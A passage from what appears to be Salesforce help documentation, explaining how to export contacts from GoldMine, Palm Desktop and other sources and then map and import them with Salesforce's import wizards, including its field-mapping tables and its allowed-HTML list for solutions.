3. Select Export to a new file and ASCII file, and click Next.
4. Select ALL Contact Records! in the drop-down list, and click Next.
5. In the list of GoldMine Fields on the left side of the dialog, select the company, lastname, and notes fields, and click

Add Field. Then click Next.
6. Choose the location for the export file, select the Export GoldMine field names... checkbox, and then click Next.
7. Select No when asked if you want to save these settings, and click Next.
8. Click Finish.
9. After the export finishes, locate the exported file and change its file extension from .txt to .csv.
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10. Open the file.
11. If necessary, clean up the file prior to importing it. Common problems include notes that have been broken between

columns (this occurs when notes contain quotation marks).

See Also:
Field Mapping for Other Data Sources and Organization Import
Creating Export Files for Import Wizards

Exporting from Palm Desktop
The Palm Desktop allows you to export your Address Book contacts in a CSV (comma-separated values) format which can
then be imported.

1. Open the Address Book in the Palm Desktop. If you only want to export specific contacts, select those records.
2. Choose Export from the File menu.
3. In the “Export To File” dialog, enter a name for the file and choose a folder for it. In the Export as drop-down list, choose

“Comma Separated (*.csv;*.txt)”. Select the range of records to export - either All or Currently selected records.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

4. Click Export.
5. In the “Specify Export Fields” dialog box, select the Address Book fields you want to export, and click OK.

See Also:
Field Mapping for Other Data Sources and Organization Import
Creating Export Files for Import Wizards

Exporting from Other Data Sources
You can import data into the system from any other application that can create a CSV (comma-separated values) file.

1. Save your data source as a CSV file.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

2. Ensure your file includes only one name per field. The system cannot accept more than one name per field.
3. Ensure your file separates names and titles into two fields. The system cannot accept fields containing both names and

titles.
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4. Ensure your file includes only one phone number per field.

See Also:
Field Mapping for Other Data Sources and Organization Import
Creating Export Files for Import Wizards

Exporting from Salesforce

Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can export account, contact, custom object, lead, or solution reports from Salesforce to create an import file for the import
wizards. You must include the Account ID, Contact ID, Custom Object ID, Lead ID, or Solution ID value for
each respective record in your report. These ID fields are unique Salesforce identifiers and are used to accurately match your
data with existing Salesforce records.

To create an import file with these ID fields, you first need to export the data from Salesforce.

1. Run an account, contact, custom object, lead, or solution report in Salesforce, include the respective ID field, and export
it to Excel.

2. If you are exporting both leads and contacts to be targeted in a campaign:

a. In Excel, combine the exported reports into one CSV (comma-separated values) file. Make sure all of the ID field
values are in the same column.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

b. Rename the Lead ID/Contact ID column to Record Id.
c. Add a column entitled Status, and enter the campaign member status for each contact or lead.

Note:  Remember that Salesforce record IDs are case-sensitive and should never be changed manually in your import
file.

See Also:
Creating Export Files for Import Wizards
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Preparing Your Data for Import

Available in: All Editions except Database.com

After exporting your data from Salesforce or your existing application, prepare your data before importing it.

Note:  If your data has information in fields that do not match any of the standard fields, your administrator can
create custom fields for that data prior to import.

You must include universally required fields in your import files or the import will fail.

Preparing Contacts

When importing from ACT! or Outlook, the Import My Contacts wizard automatically maps fields from ACT! and
Outlook to Salesforce.

When importing from other data sources, you must use Excel® to label the columns in your import file as specified in
Field Mapping for Other Data Sources and Organization Import on page 459.

Preparing Person Accounts

When importing person accounts, use the field labels in Salesforce as the column labels in your import file.

Preparing Organization's Business Accounts and Contacts

When importing business accounts and contacts for your organization, you must use Excel® to label the columns in your
import file as specified in Field Mapping for Other Data Sources and Organization Import on page 459.

Preparing Organization's Leads

When importing general leads or leads for campaigns, use the import file labels specified in Field Mapping for Importing
Leads on page 463.

Preparing Custom Objects

When importing a custom object, use the field labels shown on the custom object detail page in Salesforce as the column
labels in your import file.

Preparing Solutions

When importing solutions, use the field labels in Salesforce as the column labels in your import file.

You can enter HTML into the solutions you plan to import into Salesforce. However, unless your organization has
enabled HTML solutions, HTML tags will display in the solutions after they are imported.

For security purposes, Salesforce automatically filters all HTML solutions for potentially malicious HTML. If potentially
malicious HTML is detected in an HTML solution, then the potentially malicious HTML is either automatically
removed or transformed into text for users who view the HTML solution. Note that users will not be able to notice
when potentially malicious HTML is removed from an HTML solution.

You can import solutions written in HTML format into Salesforce. However, for security purposes, only the HTML
tags listed below are allowed. The content of any HTML tags not listed below is automatically removed when saved in
HTML solutions. Furthermore, the content of all <script> and <iframe> tags, as well as all JavaScript, is automatically
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removed when saved in HTML solutions. Additionally, Cascading Style Sheets (CSS) are not supported in HTML
solutions.

The following HTML tags are allowed in HTML solutions imported into Salesforce:

<q><dt><a>

<samp><em><abbr>

<small><font><acronym>

<span><h1><address>

<strike><h2><b>

<strong><h3><bdo>

<sub><h4><big>

<sup><h5><blockquote>

<table><h6><br>

<tbody><hr><caption>

<td><i><cite>

<tfoot><img><code>

<th><ins><col>

<thead><kbd><colgroup>

<tr><li><dd>

<tt><ol><del>

<ul><p><dfn>

<var><pre><div>

<dl>

Within the above tags, you can include the following attributes:

sizefacealt

srcheightbackground

stylehrefborder

targetnameclass

widthrowspancolspan

The above attributes which can include a URL are limited to URLs that begin with the following:
• http:
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• https:

• file:

• ftp:

• mailto:

• #

• / for relative links

See Also:
Default Field Mapping for ACT!
Default Field Mapping for Outlook
Creating Export Files for Import Wizards
Accessing the Import Wizards

Default Field Mapping for ACT!

Available in: All Editions except Database.com

This table details how ACT! fields map to Salesforce account and contact import fields during an individual data import.

Note:  If an ACT! record contains more than one contact for the same company, the import wizard creates multiple
contacts for one account.

Import FieldACT! Field

Contact: Mailing Address and

Account: Billing Address

Address 1

Contact: Mailing Address and

Account: Billing Address

Address 2

Contact: Mailing Address and

Account: Billing Address

Address 3

Contact: Other PhoneAlt Phone

Contact: Other Phone Ext.Alt Phone Ext.

Contact: Assistant's NameAssistant

Contact: Asst. PhoneAsst. Phone

Contact: Asst. Phone Ext.Asst. Phone Ext.
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Import FieldACT! Field

Contact: Mailing City and

Account: Billing City

City

Account: NameCompany

Contact: Full NameContact

Contact: Mailing Country and

Account: Billing Country

Country

Contact: DepartmentDepartment

Contact: EmailE-mail Login

(The import wizard verifies this is a valid email address in the
form: jsmith@acme.com)

Contact: Fax and

Account: Fax

Fax

Contact: Business Fax Ext.Fax Ext.

Contact: First NameFirst Name

Contact: Other Address 1Home Address 1

Contact: Other Address 2Home Address 2

Contact: Other Address 3Home Address 3

Contact: Other CityHome City

Contact: Other CountryHome Country

Contact: Home PhoneHome Phone

Contact: Other StateHome State

Contact: Other Postal CodeHome Zip

Account: TypeID/Status

Contact: Last NameLast Name

Contact: Mobile PhoneMobile Phone

Does not importNote

Contact: Phone and

Account: Phone

Phone

Contact: Business Phone Ext.Phone Ext.

Contact: Lead SourceReferred By

Account: Annual RevenueRevenue

455

Preparing Your Data for ImportImport Your Data



Import FieldACT! Field

Contact: Mailing State and

Account: Billing State

State

Account: Ticker SymbolTicker Symbol

Contact: TitleTitle

Account: WebsiteWeb Site

Contact: Mailing Postal Code

Account: Billing Postal Code

Zip

2nd Contact: Name2nd Contact

2nd Contact: Phone2nd Phone

2nd Contact: Phone Ext.2nd Phone Ext.

2nd Contact: Title2nd Title

3rd Contact: Name3rd Contact

3rd Contact: Phone3rd Phone

3rd Contact: Phone Ext.3rd Phone Ext.

3rd Contact: Title3rd Title

Contact: Note or Account: Note

(In Professional, Enterprise, Unlimited, and Developer Edition
organizations, you specify which fields import into a single

2nd Last Reach, 3rd Last Reach, Asst. Title, Last
Attempt, Last Meeting, Last Reach, Last Results,
Letter Date, Pager, Spouse, User 1-15

contact or account note; separate notes are not created for each
ACT! field.)

See Also:
Exporting from ACT!
Preparing Your Data for Import

Default Field Mapping for Outlook

Available in: All Editions except Database.com

This table details how Outlook fields map to Salesforce account and contact import fields during an individual data import.
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Import FieldOutlook Field

Contact: Assistant’s NameAssistant’s Name

Contact: Asst PhoneAssistant’s Phone

Contact: BirthdateBirthday

Contact: Mailing City and

Account: Billing City

Business City

Contact: Mailing Country and

Account: Billing Country

Business Country

Contact: Fax and

Account: Fax

Business Fax

Contact: PhoneBusiness Phone

Contact: Mailing Postal Code

Account: Billing Postal Code

Business Postal Code

Contact: Mailing Address and

Account: Billing Address

Business Street

Contact: Mailing Address and

Account: Billing Address

Business Street 2

Contact: Mailing Address and

Account: Billing Address

Business Street 3

Account: Account Name and

Contact: Account

Company

Account: PhoneCompany Main Phone

Contact: DepartmentDepartment

Contact: EmailE-mail

(The import wizard verifies this is a valid email address in the
form: jsmith@acme.com)

Contact: First NameFirst Name

Contact: Other CityHome City

Contact: Other CountryHome Country

Contact: Home PhoneHome Phone

Contact: Other Postal CodeHome Postal Code

Contact: Other AddressHome Street

457

Preparing Your Data for ImportImport Your Data



Import FieldOutlook Field

Contact: Other AddressHome Street 2

Contact: Other AddressHome Street 3

Contact: TitleJob Title

Contact: Last NameLast Name

Contact: Reports To

(In addition, if the name in this field does not match an
existing contact, a new contact is created with the manager’s
name.)

Manager's Name

Contact: Mobile PhoneMobile Phone

Contact: DescriptionNotes

Contact: Other PhoneOther Phone

Contact: Lead SourceReferred By

Contact: SalutationTitle

Account: WebsiteWeb Page

Contact: Note or Account: Note

(In Professional, Enterprise, Unlimited, and Developer Edition
organizations, you specify which fields import into a single

Account, Anniversary, Billing Information,
Business Phone 2, Callback, Car Phone,
Categories, Children, Directory Server, E-mail
2, E-mail 3, Government ID Number, Hobby, Home contact or account note; separate notes are not created for each

Outlook field.)Fax, Home Phone 2, Internet Free/Busy Address,
ISDN, Keywords, Language, Location, Middle Name,
Mileage, Office Location, Organizational ID
Number, Other City, Other Country, Other Fax,
Other Postal Code, Other State, Other Street,
Other Street 2, Other Street 3, Pager, PO Box,
Primary Phone, Profession, Radio Phone, Spouse,
Suffix, Telex, TTY/TDD Phone, User 1, User 2, User
3, User 4

See Also:
Exporting from Outlook
Preparing Your Data for Import

458

Preparing Your Data for ImportImport Your Data



Field Mapping for Other Data Sources and Organization Import

Available in: All Editions except Database.com

Organization import not available in: Personal Edition, Database.com

If you are importing accounts and contacts for an organization, or importing individual data from sources other than Outlook
or ACT!, the Import Wizards map the fields as correctly as possible. You must fine-tune the mapping before completing the
import. Before importing your data, Salesforce recommends that you use Excel to label the columns in your import file with
the labels listed below. Field length limits for each object are listed in the Salesforce Field Reference Guide.

Note:  The default mappings listed below are offered as a guide for importing; they do not ensure 100% accuracy in
mapping your data. You must fine-tune the mapping in the Import Wizards. Remember that you can map the same
field multiple times if necessary—for example, for the account and contact address fields.

Common Fields for Contacts and Accounts

Salesforce FieldLabel for Your Import File

Contact: Contact Owner and

Account: Account Owner

Record Owner

(Note: For individual imports, this field is not necessary, since
all data you import is automatically owned by you. In addition,
when importing records by Salesforce record ID, this field is
ignored.)

Contact: Contact Currency and

Account: Account Currency

Currency ISO Code

(Note: You can use this field only for organization imports in
organizations that use multiple currencies. For more
information, see Importing Multiple Currencies on page 445.)

Contact Fields

Salesforce FieldLabel for Your Import File

Contact: AssistantAssistant

Contact: Asst. PhoneAsst. Phone

Appended to Contact: Asst. PhoneAsst. Phone Ext.

Contact: BirthdateBirthdate

Contact: FaxBusiness Fax

Appended to Contact: FaxBusiness Fax Ext.

Contact: PhoneBusiness Phone

Appended to Contact: PhoneBusiness Phone Ext.
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Contact Fields

Salesforce FieldLabel for Your Import File

Contact: DescriptionContact Description

Contact: First Name and

Contact: Last Name

Contact Full Name or

First Name & Last Name

(Note: When importing contact names, use either Contact
Full Name or First Name and Last Name, but not both.)

Contact: Contact IDContact ID

(Note: Record IDs are case-sensitive and should not be
changed.)

Creates a note attached to the contactContact Note

Contact: DepartmentDepartment

Contact: EmailE-mail Address

(Note: The import wizard verifies this is a valid email address
in the form: jsmith@acme.com.)

Contact: Email Opt OutEmail Opt Out

(Note: Use “1” to indicate that user opts out; use “0” to indicate
that user wants emails.)

Contact: Home PhoneHome Phone

Appended to Contact: Home PhoneHome Phone Ext.

Contact: Lead SourceLead Source

Contact: Mailing CityMailing City

Contact: Mailing CountryMailing Country

Contact: Mailing Address Zip/Postal CodeMailing Postal Code

Contact: Mailing State/ProvinceMailing State

Contact: Mailing AddressMailing Street 1

Contact: Mailing AddressMailing Street 2

Contact: Mailing AddressMailing Street 3

Contact: MobileMobile Phone

Appended to Contact: MobileMobile Phone Ext.

Contact: Other CityOther City

Contact: Other CountryOther Country

Contact: Other PhoneOther Phone

460

Preparing Your Data for ImportImport Your Data



Contact Fields

Salesforce FieldLabel for Your Import File

Appended to Contact: Other PhoneOther Phone Ext.

Contact: Other Address Zip/Postal CodeOther Postal Code

Contact: Other State/ProvinceOther State

Contact: Other AddressOther Street 1

Contact: Other AddressOther Street 2

Contact: Other AddressOther Street 3

Contact: Reports ToReports To

(Note: If the import wizard cannot find a contact that matches
the name in this field, it will create a new contact using this
value as the Contact: First Name & Last Name.)

Prefixed to Contact: First NameSalutation

Contact: TitleTitle

Split into Contact: First Name & Last Name for a second
contact for the account

2nd Contact

Contact: Phone for a second contact for the account2nd Phone

Appended to Contact: Phone for a second contact for the
account

2nd Phone Ext.

Contact: Title for a second contact for the account2nd Title

Split into Contact: First Name & Last Name for a third
contact for the account

3rd Contact

Contact: Phone for a third contact for the account3rd Phone

Appended to Contact: Phone for a third contact for the
account

3rd Phone Ext.

Contact: Title for a third contact for the account3rd Title

Account Fields

Salesforce FieldLabel for Your Import File

Account: DescriptionAccount Description

Account: Account DivisionAccount Division

(Note: You do not need to specify this field if you choose to
assign the division via the drop-down list on Step 1 of the
import wizard. If you do not map this field or use the division
drop-down list, the division is set to the record owner’s default
division for each record.)
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Account Fields

Salesforce FieldLabel for Your Import File

Account: FaxAccount Fax

Appended to Account: FaxAccount Fax Ext.

Account: Account IDAccount ID

(Note: Record IDs are case-sensitive and should not be
changed.)

Account: Account Name and

Contact: Account

Account Name

Creates a note attached to the accountAccount Note

Account: Account NumberAccount Number

Account: PhoneAccount Phone

Appended to Account: PhoneAccount Phone Ext.

Account: Account SiteAccount Site

Account: TypeAccount Type

Account: Billing CityBilling City

Account: Billing CountryBilling Country

Account: Billing Zip/Postal CodeBilling Postal Code

Account: Billing State/ProvinceBilling State

Account: Billing AddressBilling Street 1

Account: Billing AddressBilling Street 2

Account: Billing AddressBilling Street 3

Account: EmployeesEmployees

Account: IndustryIndustry

Account: OwnershipOwnership

Account: Parent AccountParent Account

(Note: If the import wizard cannot find an account that
matches the parent account name, it will create a new account
using this value as the Account Name.)

Account: Account Site

(Note: Maps to the Account Site field in the parent
account.)

Parent Account Site

(Note: Indicates the site value of Parent Account.)

Account: RatingRating
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Account Fields

Salesforce FieldLabel for Your Import File

Account: Annual RevenueRevenue

Account: Shipping CityShipping City

Account: Shipping CountryShipping Country

Account: Shipping Zip/Postal CodeShipping Postal Code

Account: Shipping State/ProvinceShipping State

Account: Shipping AddressShipping Street 1

Account: Shipping AddressShipping Street 2

Account: Shipping AddressShipping Street 3

Account: SIC CodeSIC Code

Account: Ticker SymbolTicker Symbol

Account: WebsiteWebsite

Note:  If you include record types in your import file, the Import Wizard uses the record owner’s default record type
when creating new records. For existing records, the Import Wizard does not update the record type field.

See Also:
Preparing Your Data for Import

Field Mapping for Importing Leads

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

When you import leads, the Import My Organization’s Leads wizard and the campaign Import Leads wizard map the fields
in your import file as correctly as possible, but you must fine-tune the mapping before completing the import. Prior to importing
your leads, it is recommended that you use Excel to label the columns in your lead import file with the labels listed in the table
below.

Note:  The default mappings listed below are offered as a guide for importing; they do not ensure 100% accuracy in
mapping your data. You must fine-tune the mapping in the Import Wizard.

Salesforce Lead FieldLabel for Your Import File

Annual RevenueAnnual Revenue

CityCity
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Salesforce Lead FieldLabel for Your Import File

CompanyCompany

CountryCountry

Lead Currency
Currency ISO Code

(Note: You can use this field only for organizations that use
multiple currencies; see Importing Multiple Currencies on
page 445.)

DescriptionDescription

Email
Email

(The import wizard verifies this is a valid email address in the
form: jsmith@acme.com.)

Email Opt Out
Email Opt Out

(Use “1” to indicate that the user opts out; use “0” to indicate
that the user wants emails.)

No. of EmployeesNo. of Employees

FaxFax

First Name and Last Name
Full Name or First Name & Last Name

(Note: When importing lead names, use either Full Name
or First Name and Last Name, but not both.)

IndustryIndustry

Lead Division
Lead Division

(Note: You do not need to specify this field if you choose to
assign the division via the drop-down list on Step 1 of the
import wizard. If you do not map this field or use the division
drop-down list, the division is set to the record owner’s default
division for each record.)

Lead ID
Lead ID

(Note: Record IDs are case-sensitive and should not be
changed.)

Lead Source
Lead Source

(Note: You do not need to specify this field if you choose to
assign the same Lead Source to all leads on the first page
of the import wizard.)
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Salesforce Lead FieldLabel for Your Import File

Lead StatusLead Status

MobileMobile Phone

PhonePhone

Postal CodePostal Code

RatingRating

Lead Owner
Record Owner

(Note: You do not need this field if assigning ownership via
a lead assignment rule. In addition, when importing records
by Salesforce record ID, this field is ignored.)

Added to beginning of First NameSalutation

StateState

StatusStatus

(in the Campaign History related list of a lead)(For campaign Import Leads wizard only.)

AddressStreet 1

AddressStreet 2

AddressStreet 3

TitleTitle

WebsiteWebsite

Note:

If you include record types in this list, the Import Wizard uses the record owner’s default record type when creating
new records. For existing records, the Import Wizard does not update the record type field.

If you choose to use assignment rules, the Import Wizard uses the new owner’s default record type when creating
new records. When the assignment rules assign the record to a queue, the queue owner’s default record type is used.

See Also:
Import My Organization’s Leads
Preparing Your Data for Import
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Accessing the Import Wizards
For Records You Own
To access import wizards for records you personally own, go to your personal settings and select Import.

• Import My Contacts
• Import My Person Accounts

For Your Organization's Records
To access import wizards for organization-wide data, from Setup, select Data Management.

• Import My Organization’s Accounts and Contacts
• Import My Organization's Person Accounts
• Import My Organization’s Leads
• Import My Organization's Solutions
• Import My Organization's Custom Objects

For Campaign Members
To access the campaign import wizards, view a campaign and click Manage Members. Then click the appropriate link:

• Add Members - Import File
• Update & Add Members - Import File

See Also:
Importing Overview

Import My Contacts
Use a wizard to import your personal contacts and associated business accounts.

Available in: All Editions except Database.com

With the Import My Contacts wizard, any user can import up to 500 personal contacts and associated business accounts.
Contact your system administrator if you can’t access the Import Wizard.

Before beginning, create an export file (see Creating Export Files for Import Wizards on page 446) and correctly prepare your
data (see Preparing Your Data for Import on page 452).

Note:  We recommend you import a small test file first to make sure that you have prepared your import file correctly.

1. Start the wizard
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From your personal settings, click Import > Import My Accounts & Contacts, and click Start the Import Wizard!.
Alternatively, click the Import My Accounts & Contacts link in the Tools area of the account home page. Note that the
labels for business contacts and business accounts may have been renamed by your administrator, in which case the “Import
My...” links may have customized text.

2. Select the source

a. Specify the source application of your data - ACT!, Outlook, or other data source (any CSV file).
b. Click Next to continue.

3. Upload the file

a. Click Browse to load your file.
b. If importing from ACT! or Outlook, click Import Now!, or click Customize Mappings to verify the field mappings.
c. If importing from any other source, select the character encoding of the file. Most users will not need to change the

default setting.
d. Choose whether to match your contacts by name or by email. This field sets the criteria for avoiding duplicates. For

example, if you are matching by email and a record in your source file has the same email as a record in Salesforce, then
that record will be updated in Salesforce. If you are not matching by email and there is a record in Salesforcewith the
same email, then a new record will be created.

e. Choose Next to continue.

4. Map the fields

a. On four different mapping pages, the wizard associates the Salesforce field names with the field names from your
import file. You must check the default mappings and alter any incorrect mappings. For more information about the
default field mappings, see Preparing Your Data for Import on page 452.

b. Note that there is no Record Owner field; you are automatically assigned as the owner of any data you import. On
the Map Account Fields page, check the Overwrite existing account values box if you want to overwrite
existing business account fields with your import data. Note that you cannot use this checkbox to update existing field
data with blank values.

c. You can import data only into the fields that are editable for you in your page layout or field-level security settings.
d. When all fields are assigned correctly, click Next.

5. Map the miscellaneous fields

a. The wizard reports the fields that do not map.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can choose whether the unmapped
fields should be imported into an business account or contact Note or should not be imported at all. The fields are
imported into a single business account Note or a single contact Note; separate note fields are not created for each
import field.

b. When all fields are assigned correctly, click Import Now!.

See Also:
Importing Overview
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Import My Person Accounts

Person account import available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on accounts

AND

“Read” on contacts

AND

“Import Personal Contacts”

AND

At least one person account record type available from your
profile or permission sets

To import your own person accounts:

With the Import My Person Accounts wizard, you can import person accounts that you own. To understand how person
account records are matched to prevent duplicates, see What Is Imported for Person Accounts? on page 439.

Note:  Your administrator may have renamed “person account” to another term. If so, the import wizard will refer
to the new name.

Follow these steps to import your person accounts. Click each link for more details.

1. Launch the wizard
2. Prevent duplicate records
3. Select record type
4. Upload your import file
5. Map fields
6. Confirm and submit your import
7. Complete your import

Launch the wizard

1. To import your person accounts, from your personal settings select Import > Import My Person Accounts.

Alternatively, click Import My Person Accounts in the Tools area of the accounts home page.

2. For best results, perform all of the steps provided on the introductory page.
3. Click Start the Import Wizard! to begin your import.

Prevent Duplicate Records

1. Choose the field that you are using to match existing records in Salesforce with records in your import file. The External
ID option is disabled if no external ID fields have been created for your records.
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2. Choose what you want to happen if matches are found - only import new records, only update existing records, or update
existing records and import new ones.

Note:  If you have chosen to match by Salesforce ID, you can only update existing records; you cannot import
new ones.

3. Click Next.

Select record type

1. Choose the record type that you want to assign to the records in your import file.
2. If you are inserting new records and updating existing records at the same time, then choose whether to override the record

types of existing records.
3. Click Next.

Upload your import file

1. Click Browse... to provide the location of your import file.
2. Choose the character encoding of your import file. In most cases, you can accept the default value.
3. Make additional settings depending on the setup of your organization, such as whether workflow rules will be triggered

and the language of the records in the import file.
4. Click Next.

Map fields

1. Map the fields in your import file to the appropriate Salesforce fields by matching the fields on the left, which includes all
the columns in your import file, with the appropriate Salesforce field on the right. If the column labels in your import file
exactly match field labels in Salesforce, the wizard automatically maps those fields for you. However, if two or more of
your file's column labels are identical matches with a field in Salesforce, you must map the fields manually.

Note:  Some Salesforce fields cannot be updated using import, for example, the Created Date and Last
Modified Date. So even though you may be using an exported report as your import file, some of the Salesforce
fields in your file cannot be mapped.

2. Click Next. The import wizard warns you if you have not mapped all of the fields in your import file. Unmapped field
values are not imported.

Confirm and submit your import

1. Read any warning messages that the import wizard displays. Optionally, click Previous to return to earlier steps and resolve
potential problems.

2. Click Import Now! to submit your import request to Salesforce.

Complete your import

1. A message indicates approximately how long the import will take. When the import operation is finished, a message from
Customer Support will be sent to the email address shown.

2. Click Finish to exit the wizard.
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3. To monitor the status of your pending import, from Setup, click Monitoring > Imports.

See Also:
Importing Overview

Import My Organization’s Accounts and Contacts

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

With the Import My Organization’s Accounts and Contacts wizard, administrators, and users with the “Modify All Data”
permission, can import up to 50,000 business accounts and contacts at a time for multiple users. Before beginning, make sure
you have created an export file and correctly prepared your data.

Note:  We recommend you import a small test file first to make sure that you have prepared your import file correctly.

1. Start the wizard.

From Setup, click Data Management > Import Accounts/Contacts (or Import Business Accounts/Contacts if your
organization uses person accounts). Review the steps provided on the welcome page, then click Start the Import Wizard!.
Alternatively, click the appropriate link in the Tools area of the accounts home page.

Note:  If your organization uses person accounts and the labels for business accounts and business contacts have
been renamed, the renamed labels will appear in the Tools area of the accounts home page, but not in Setup pages.

2. Create your import file.

a. Follow the instructions to create an import file.
b. Click Next to continue.

3. Upload the file.

a. Click Browse to load your file.
b. Select the character encoding of your file. Most users will not need to change the default character encoding setting.
c. Choose whether to match your organization’s contacts by Salesforce ID, name, or email. Similarly, choose whether to

match your organization’s accounts by Salesforce ID or by name and site. Note that matching by Salesforce ID is
inclusive of both contacts and accounts.

These Matching Type fields set the criteria for avoiding duplicates. For example, if you are matching by email and
a record in your source file has the same email as a record in Salesforce, then that record will be updated in Salesforce.
If you are not matching by email and there is a record in Salesforce with the same email, then a new record will be
created. Note that contacts are matched only within the same account. If contacts related to different accounts have
the same name or email, they treated as separate contacts.

d. Organizations that use the Translation Workbench can specify the language of the import data.
e. If you use divisions, select a division to assign to all imported records. Alternatively, select “None” to use the record

owner’s default division on each record, or specify the division in your import file.
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f. Select the checkbox to trigger workflow rules for new and updated records that match workflow rule criteria.
g. Click Next to continue.

4. Map the fields.

a. On four different mapping pages, the wizard associates the Salesforce field names with the field names from your
import file. You must check the default mappings and alter any incorrect mappings

b. Remember to map the Record Owner field with your Record Owner field so that record ownership is assigned
correctly. When importing records by Salesforce record ID, the Record Owner field in your import file is ignored.
All records retain their existing owners; record owners cannot be updated using the import wizard.

c. On the Map Account Fields page, check the Overwrite existing account values box if you want to overwrite
existing account fields with your import data. Note that you cannot use this checkbox to update existing field data with
blank values.

d. When all fields are assigned correctly, click Next.

5. Map the miscellaneous fields.

a. The wizard reports the fields that do not map. In Professional, Enterprise, Unlimited, and Developer Edition
organizations, you can choose whether the unmapped fields should be imported into an account or contact Note or
should not be imported at all. The fields are imported into a single account Note or a single contact Note; separate
note fields are not created for each import field.

b. When all fields are assigned correctly, click Next.

6. Review and confirm.

a. If there are warnings on this page, stop the import process and correct your import file.
b. Select Import Now! to send your import request. Your data is imported within the next 24 hours, and we notify you

via email when the import is complete. Once the system begins processing, you cannot cancel the import.

7. Check the Import Queue.

a. You can use the Import Queue to check the progress of your import. From Setup, click Monitoring > Imports.
Alternatively, click the Import Queue link on the Import Wizard for My Organization page. For imports that have
not begun processing, you can click Del to cancel the import.

Note:  If your organization uses territory management, your imported accounts are always evaluated by account
assignment rules.

See Also:
Creating Export Files for Import Wizards
Preparing Your Data for Import
Importing Overview
Creating Export Files for Import Wizards
Preparing Your Data for Import
Accessing the Import Wizards
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Import My Organization's Person Accounts

Person account import available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Import Person Accounts”To import your organization's person accounts:

With the Import My Organization's Person Accounts wizard, you can import person accounts that are owned by different
users. To understand how person account records are matched to prevent duplicates, see What Is Imported for Person Accounts?
on page 439.

Note:  If the label for person accounts has been renamed for your organization, the renamed label will appear in the
import wizard itself and in the Tools area of the accounts home page, but not in the Data Management area under
Setup. (Renamed labels do not appear in any pages in Setup.)

Follow these steps to import person accounts for your organization.

1. Launch the wizard
2. Prevent duplicate records
3. Specify owner and lookup relationships
4. Select record type
5. Upload your import file
6. Map fields
7. Confirm and submit your import
8. Complete your import

Note:  The import wizard is dynamic; it displays different screens depending on what you are importing and the setup
of your organization.

Launch the wizard

To import person accounts for your organization:

1. From Setup, click Data Management > Import Person Accounts.

Alternatively, click Import My Organization's Person Accounts in the Tools area of the accounts home page.

2. For best results, perform all of the steps provided on the introductory page.
3. Click Start the Import Wizard! to begin your import.

Prevent duplicate records

1. The import wizard can compare the records in your import file with existing records in Salesforce in order to prevent
duplicate records from being created as a result of your import. Indicate whether you would like to prevent duplicate records
from being created. You must select Yes in order to update existing records.

2. If you choose Yes, then additional choices will appear:
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• Choose the field that you are using to match existing records in Salesforce with records in your import file. The
External ID option is disabled if no external ID fields have been created for your records.

• Choose what you want to happen if matches are found—only import new records, only update existing records, or
update existing records and import new ones.

Note:  If you have chosen to match by Salesforce ID, you can only update existing records; you cannot
import new ones.

3. Click Next.

Specify owner and lookup relationships

1. Specify the field in your import file that contains person account owners.

When you choose “Name,” the following formats are valid:

• First name followed by last name
• Last name followed by first name
• Alias
• Username

2. Records can have custom fields that create lookup relationships with other records. If you have included lookup fields in
your import file, then check the corresponding boxes.

Note:  Any related records must already exist in Salesforce before proceeding. Related records will not be updated
during your import even if your import file contains different values for fields on those related records.

3. Click Next.

Select record type

1. Choose the record type that you want to assign to the records in your import file.
2. If you are inserting new records and updating existing records at the same time, then choose whether to override the record

types of existing records.
3. Click Next.

Upload your import file

1. Click Browse... to provide the location of your import file.
2. Choose the character encoding of your import file. In most cases, you can accept the default value.
3. Make additional settings depending on the setup of your organization, such as whether workflow rules will be triggered

and the language of the records in the import file.
4. Click Next.

Map fields

1. Map the fields in your import file to the appropriate Salesforce fields by matching the fields on the left, which includes all
the columns in your import file, with the appropriate Salesforce field on the right. If the column labels in your import file
exactly match field labels in Salesforce, the wizard automatically maps those fields for you. However, if two or more of
your file's column labels are identical matches with a field in Salesforce, you must map the fields manually.
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Note:  Some Salesforce fields cannot be updated using import, for example, the Created Date and Last
Modified Date. So even though you may be using an exported report as your import file, some of the Salesforce
fields in your file cannot be mapped.

2. Click Next. The import wizard warns you if you have not mapped all of the fields in your import file. Unmapped field
values are not imported.

Confirm and submit your import

1. Read any warning messages that the import wizard displays. Optionally, click Previous to return to earlier steps and resolve
potential problems.

2. Click Import Now! to submit your import request to Salesforce.

Complete your import

1. A message indicates approximately how long the import will take. When the import operation is finished, a message from
Customer Support will be sent to the email address shown.

2. Click Finish to exit the wizard.
3. To monitor the status of your pending import, from Setup, click Monitoring > Imports.

See Also:
Importing Overview

Import My Organization’s Leads

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read”, “Create”, and “Edit” on leads

AND

“Import Leads”

To use the Import My Organization's Leads wizard:

With the Import My Organization’s Leads wizard, administrators, users with the Marketing User profile, or users with the
“Import Leads” permission and “Read,” “Create,” and “Edit” permissions on leads can import up to 50,000 leads at a time for
multiple users. Before beginning, make sure you have created an export file and correctly prepared your data.

Note:  We recommend you import a small test file first to make sure that you have prepared your import file correctly.

1. Start the wizard.

From Setup, click Data Management > Import Leads, and click Start the Import Wizard.

2. Upload the file.
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a. Select Browse to load your import file.
b. If desired, select a value to import into the Lead Source field of all imported leads. Alternatively, you can assign the

lead source via a Lead Source field in your import file. You must specify a Lead Source value that is not marked
as “Converted”; leads with a “Converted” status will not be imported.

c. Next, choose a lead assignment rule to determine the owners of imported leads. If you have a Record Owner field in
your import file, do not select an assignment rule. Without an assignment rule or a Record Owner field in your import
file, all leads are assigned to the administrator doing the import. When importing records by Salesforce record ID, the
Record Owner field in your import file is ignored. All records retain their existing owners; record owners cannot be
updated using the import wizard.

d. If you have chosen an assignment rule, select the Use assignment rule settings to send notification
emails to record owners checkbox to send notification emails to owners of newly created leads. If you do not
select the checkbox, no email notifications are sent, regardless of your assignment rule settings.

e. Then select the character encoding of your file. Most users do not need to change the default setting.
f. Choose whether to match your organization’s leads by Salesforce ID, name, or email. This field sets the criteria for

